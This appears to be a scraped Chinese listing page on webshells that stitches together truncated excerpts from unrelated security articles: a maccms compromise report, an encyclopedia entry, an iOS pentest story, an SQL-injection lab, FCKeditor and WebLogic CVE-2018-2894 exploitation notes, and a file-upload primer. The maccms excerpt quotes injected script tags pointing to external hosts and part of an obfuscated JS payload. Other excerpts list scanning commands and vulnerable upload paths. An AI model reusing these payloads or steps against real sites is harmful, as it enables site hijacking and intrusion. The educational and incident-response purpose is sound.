webshell

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 苹果CMS漏洞 是越来越多了，国内很多电影网站都使用的是maccms V10 V8版本，就在2020年初该maccms漏洞爆发了，目前极少数的攻击者掌握了该EXP POC，受该BUG的影响，百分之80的电影站都被攻击了，很多电影站的站长找到我们SINE安全来解决网站被挂马的问题，通过分析我们发现大部分客户网站在数据库中都被插入了挂马代码，<script src=https://lefengtv.com/js/tjj.js></script><script src=https://pkvod.com/1.js</script>，尤其电影片名d_name值被直接篡改，并且是批量挂马，导致用户打开网站访问直接弹窗广告并跳转。 JS挂马代码如下： eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>3 5?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e (c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+

# -*- coding: utf-8 -*- #use: python file_check.py ./ import os import hashlib import shutil import ntpath import time CWD = os.getcwd() FILE_MD5_DICT = {} # 文件MD5字典 ORIGIN_FILE_LIST = [] # 特殊文件路径字符串 Special_path_str = 'drops_JWI96TY7ZKNMQPDRUOSG0FLH41A3C5EXVB82' bakstring = 'bak_EAR1IBM0JT9HZ75WU4Y3Q8KLPCX26NDFOGVS' logstring = 'log_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD' webshellstring = 'webshell_WMY4RVTLAJFB28960SC3KZX7EUP1IHOQN5GD' difffile = 'diff_UMTGPJO17F82K35Z0LEDA6QB9WH4IYRXVSCN' Special_string = 'drops_log' # 免死金牌 UNICODE_ENCODING = "utf-8" INVALID_UNICODE_CHAR_FORMAT = r"\?%02x" #

百科名片 顾名思义，“web”的含义是显然需要服务器开放web服务，“shell”的含义是取得对服务器某种程度上操作权限。webshell常常被称为匿名用户（入侵者）通过网站端口对网站服务器的某种程度上操作的权限。由于webshell其大多是以动态脚本的形式出现，也有人称之为网站的后门工具。 [ 编辑本段 ] 产品及服务 　　一方面，webshell可以被站长常常用于网站管理、服务器管理等等。 　　根据FSO权限的不同，作用有在线编辑网页脚本、上传下载文件、查看数据库、执行程序命令（视webshell权限而定）等。 　　另一方面，被入侵者利用，从而达到控制网站服务器的目的。这些网页脚本常称为webshell。 　　脚本木马，目前比较流行的asp或php木马，也有基于.NET的脚本木马。 　　当然，也不排除白帽子 黑客 对网站的安全检测（即我们说的“红客”）。 [ 编辑本段 ] 优点 　　webshell 最大的优点就是可以穿越防火墙，由于与被控制的服务器或远程主机交换的数据都是通过80端口传递的，因此不会被防火墙拦截。 　　并且使用webshell一般不会在系统日志中留下记录，只会在网站服务器的日志中留下一些数据提交记录，没有经验的管理员是很难看出入侵痕迹的。 　　 webshell的隐蔽性 　　有些恶意网页脚本可以嵌套在正常网页中运行，且不容易被查杀。 　

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> IOS端的APP渗透测试在整个互联网上相关的安全文章较少，前几天有位客户的APP数据被篡改，导致用户被随意提现，任意的提币，转币给平台的运营造成了很大的经济损失，通过朋友介绍找到我们SINE安全公司寻求安全解决方案，防止APP继续被篡改与攻击，针对客户的这一情况我们立即成立安全应急响应小组，对客户的APP以及服务器进行了全面的安全渗透。 首先要了解客户的IOS APP应用使用的是什么架构，经过我们安全工程师的详细检查与代码的分析，采用的是网站语言开发，PHP+mysql数据库+VUE组合开发的，服务器系统是Linux centos版本。 我们搭建起 渗透测试 的环境，下载的客户的最新APP应用到手机当中，并开启了8098端口为代理端口，对APP的数据进行了抓包与截取，打开APP后竟然闪退了，通过抓包获取到客户的APP使用了代理检测机制，当手机使用代理进行访问的时候就会自动判断是否是使用的代理，如果是就返回错误值，并强制APP退出，断掉一切与APP的网络连接。那么对于我们SINE安全技术来说，这都是很简单的就可以绕过，通过反编译IPA包，代码分析追踪到APP代理检测的源代码，有一段代码是单独设置的，当值判断为1就可以直接绕过，我们直接HOOK该代码，绕过了代理检测机制。

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 2020年即将到来，2019年的网站安全工作已经接近尾声，我们SINE网站安全监测平台对上万客户网站的安全防护情况做了全面的安全分析与统计，整理出2020年的网站安全监测预测报告，针对发现的网站漏洞以及安全事件来更好的完善网站安全，提供安全防御等级，防止网站被攻击，切实落实到每个客户的网站上，确保整个网络安全的高速稳定发展。 网站安全监测的网站对象分别为，企业网站，事业单位网站，学校教育网站，个人站长网站，医院网站，APP网站，目前企业网站占据我们SINE安全客户的百分之60，事业单位占比在百分之10，个人站长类网站占比百分之20，其余的学校，医院，教育，APP类网站占比百分之10，综合这几大类客户网站来进行全局的网站安全监测。主要监测的是网站漏洞监测，网站安全风险，敏感信息泄露风险，密码风险，搜索引擎收录劫持风险监测。 安全监测10000个网站，共计监测到986个网站漏洞，以及100多个网站存在敏感信息泄露风险，以及2158个网站存在密码风险，1355个网站存在搜索引擎收录劫持风险，其中网站漏洞最高危的是：sql注入漏洞，网站源代码远程执行漏洞，XSS跨站漏洞。 SQL注入漏洞：利用我们SINE安全的专业术语来讲，网站如果存在该漏洞会导致网站的管理员账号密码被攻击者看到

1、SQL注入漏洞介绍 SQL注入攻击指的是通过特殊的输入作为参数拆入Web应用程序，而这些输入大都是SQL语法里的一些组合，通过执行SQL语句中进而执行攻击者所要的操作，起主要原因是程序没有细致地过滤用户输入的数据，致使非法数据入侵系统。 任何一个用户可以输入的位置都可能是注入点。比如url中，以及http报文中，POST传递的参数； 实验环境 攻击机：10.0.2.11 靶场机器：10.0.2.10   2、信息探测 扫描主机开放的全部端口 –nmap -T4 -p- 靶场IP地址 快速扫描主机全部信息 –nmap -T4 -A -V 靶场IP地址 我们可以发现80端口和8080端口开放的http服务   探测敏感信息 –nikto -host http://靶场IP地址：端口 –dirb http://靶场IP地址:端口 分析扫描的结果80端口 打开我们发现了一个登录界面   3、漏洞扫描 漏洞扫描器Owasp-zap 先对默认的80端口进行探测 未发现高危漏洞 接着扫描8080端口 也未发现高危漏洞 对登录界面我们想到该页面是否具有对应的SQL注入，可以使我们注入到系统库当中，获取对应的数据   4、漏洞利用 针对web进行漏洞扫描 对扫描的结果进行分析。注意如果具有SQL注入漏洞，可以直接利用。毕竟SQL注入是高危漏洞，可以直接获取服务器权限。但扫描结果也不一定正确。  

1.1Fckeditor漏洞总结及其渗透某服务器 有些漏洞看起来简单，级别比较低，不如SQL注入等漏洞来的直接，但在条件合适的情况下，小漏洞发挥大作用，一直以来都想做一个Fckeditor漏洞总结，免得每次遇到目标都需要重新搜索，浪费时间。 1.1.1FCKeditor编辑器漏洞利用总结 1.判断fckeditor版本 通过/fckeditor/editor/dialog/fck_about.html和/FCKeditor/_whatsnew.html页面文件中的版本号来确定。例如访问 http://***.1**.***.***:8081/fckeditor/_whatsnew.html ，获知其版本号为2.4.3。 图1获取Fckeditor版本 2.常见的测试上传地址 　 Fckeditor编辑器默认会存在test.html和uploadtest.html文件，直接访问这些文件可以获取当前文件夹文件名称以及上传文件，有的版本可以直接上传任意文件类型，测试上传地址有： （1）FCKeditor/editor/filemanager/browser/default/connectors/test.html （2）FCKeditor/editor/filemanager/upload/test.html （3）FCKeditor/editor/filemanager

一. 什么是文件上传漏洞 Web应用程序通常会有文件上传的功能, 例如在 BBS 发布图片 , 在个人网站发布ZIP 压缩 包, 在办公平台发布DOC 文件等 , 只要 Web应用程序允许上传文件, 就有可能存在文件上传漏 洞. 什么样的网站会有文件上传漏洞? 大部分文件上传漏洞的产生是因为Web应用程序没有对上传文件的格式进行严格过滤 , 还有一部分是攻击者通过 Web服务器的解析漏洞来突破Web应用程序的防护, 后面我们会讲 到一些常见的解析漏洞 , 最后还有一些不常见的其他漏洞, 如 IIS PUT 漏洞等 . 二. 文件上传漏洞的危害 上传漏洞与SQL 注入或 XSS 相比 , 其风险更大 , 如果 Web应用程序存在上传漏洞 , 攻击者甚至 可以直接上传一个 webshell到服务器上 . 三. 常见的解析漏洞 1.IIS 解析漏洞 IIS6.0 在解析文件时存在以下两个解析漏洞 . ①当建立 *.asa 、*.asp 格式的文件夹时 , 其目录下的任意文件豆浆被 IIS 当作 asp 文件 来解析 . ② 在 IIS6.0 下 , 分 号 后面 的 扩 展 名 不 会 被 解 析 , 也 就 是 说 当 文 件 为 *.asp;.jpg 时,IIS6.0 同样会以 ASP脚本来执行 . 2.Apache 解析漏洞 在 Apache 1.x 和 Apache 2.x

Weblogic任意文件上传漏洞（CVE-2018-2894）复现 漏洞背景 WebLogic管理端未授权的两个页面存在任意上传getshell漏洞，可直接获取权限。两个页面分别为 /ws_utc/begin.do，/ws_utc/config.do 。 影响范围 Oracle WebLogic Server，版本 10.3.6.0，12.1.3.0，12.2.1.2，12.2.1.3 。 漏洞详情 http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html#AppendixFMW 漏洞复现 本次漏洞环境是用docker搭建的，环境启动后，访问Weblogic控制台： 应为是本地搭建环境，所以在登陆日志中寻找登陆密码： docker-compose logs | grep password 可得登陆用户名密码为： weblogic/eZh6Cefm 正常的环境是判断是否存在weblogic弱口令，或者根据版本信息来读取敏感文件，比如，或者 后台用户密文与密钥文件，或者就像登陆日志logs之类的，来得到登陆密码。 得到用户名密码后，我们尝试登陆后台页面，点击base_domain的配置， 在“高级”中开启“启用 Web 服务测试页”选项: 保存配置 访问 http://192.168.0

【推荐】2019 Java 开发者跳槽指南.pdf(吐血整理) >>> 一、 文件上传漏洞与WebShell的关系 文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马，病毒，恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的，部分文件上传漏洞的利用技术门槛非常的低，对于攻击者来说很容易实施。 文件上传漏洞本身就是一个危害巨大的漏洞，WebShell更是将这种漏洞的利用无限扩大。大多数的上传漏洞被利用后攻击者都会留下WebShell以方便后续进入系统。攻击者在受影响系统放置或者插入WebShell后，可通过该WebShell更轻松，更隐蔽的在服务中为所欲为。 这里需要特别说明的是上传漏洞的利用经常会使用WebShell，而WebShell的植入远不止文件上传这一种方式。 1 Webshell简介 WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境，也可以将其称之为一种网页后门。攻击者在入侵了一个网站后，通常会将这些asp或php后门文件与网站服务器web目录下正常的网页文件混在一起，然后使用浏览器来访问这些后门，得到一个命令执行环境，以达到控制网站服务器的目的（可以上传下载或者修改文件，操作数据库，执行任意命令等）。 WebShell后门隐蔽较性高，可以轻松穿越防火墙